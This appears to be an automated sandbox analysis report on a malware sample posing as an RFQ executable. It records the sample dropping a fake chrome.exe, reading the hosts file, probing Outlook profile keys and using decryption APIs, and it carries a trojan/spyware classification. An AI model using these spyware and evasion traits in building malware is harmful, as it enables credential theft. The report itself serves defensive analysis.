Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648E280
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485330
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648EB30
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485BE0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648F3E0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648C398
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06488BA8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06480040
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483070
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06486038
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648F838
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064868E8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648D098
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483920
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064841D0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487198
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484621
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484EC8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648E6C8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648B6C9
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487E90
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06488741
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485778
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648EF79
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06486483
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064834B8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483D68
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06486D37
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064875E0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648DDF0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484A70
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648E271
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487A3B
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064882E8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648EB20
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485321
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485BD0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648F3D0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483063
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648C00F
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648F828
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648602F
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648C020
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06480033
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064868D8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483910
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064841C0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487188
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B761E0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B76A10
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B67160
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B5B170
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B13980
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B3B220
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AADA80
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B993DC
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A76BA0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A74B50
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B5DB20
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8BE1CE0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AAE4B0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B3DC90
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A76C80
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B395A0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B665D0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AA4540
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AB0540
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A75D90
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8C05550
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A77D60
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AB96A0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8C0CEC0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B5A630
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B5AFE0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B65FA0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AE9780
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B3E8B0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AC60E0
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: String function: 00007FF7A8A9AED0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: String function: 00007FF7A8BBD690 appears 39 times
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 0_2_01722F68 CreateProcessAsUserA,
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilename vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.292339706.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000002.316474597.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.298522029.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilename vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000001.00000000.267745770.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000001.00000002.527555148.0000000000F37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilenameJxIIaRUTvaLxexPWTLbbe.exe4 vs RFQ__637456464647.exe
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: RFQ__637456464647.exeReversingLabs: Detection: 46%
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Users\user\Desktop\RFQ__637456464647.exeJump to behavior
                  Source: RFQ__637456464647.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe "C:\Users\user\Desktop\RFQ__637456464647.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                  Source: chrome.exe.0.drBinary string: HKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolumeverifier.dllKeyg_handles_to_closesbox_alternate_desktop_local_winstation_0x%X
                  Source: chrome.exe.0.drBinary string: CreateAppContainerProfileuserenvDeriveAppContainerSidFromAppContainerNameGetAppContainerRegistryLocationGetAppContainerFolderPath\\.\pipe\%ls\%ls@g_interceptionsntdll.dllg_originalsg_ntntdll.dllNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExkernel32.dll\Device\
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@2/2
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.13.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.2.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.11.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.1.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.0.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: RFQ__637456464647.exe, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8BDA170 FormatMessageA,GetLastError,
                  Source: RFQ__637456464647.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6312
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: RFQ__637456464647.exe, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: RFQ__637456464647.exe, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: RFQ__637456464647.exe, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: RFQ__637456464647.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: RFQ__637456464647.exeStatic file information: File size 2844160 > 1048576
                  Source: RFQ__637456464647.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ__637456464647.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2b5a00
                  Source: RFQ__637456464647.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: System.Windows.Forms.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: k,C:\Windows\System.pdb source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Windows.Forms.pdbxT source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: 7.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: .pdb, source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdbP>Q source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB6 source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: chrome.exe.pdb source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr
                  Source: Binary string: System.Core.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D9B97 push B000005Eh; iretd
                  Source: chrome.exe.0.drStatic PE information: section name: .00cfg
                  Source: chrome.exe.0.drStatic PE information: section name: .retplne
                  Source: chrome.exe.0.drStatic PE information: section name: CPADinfo
                  Source: chrome.exe.0.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
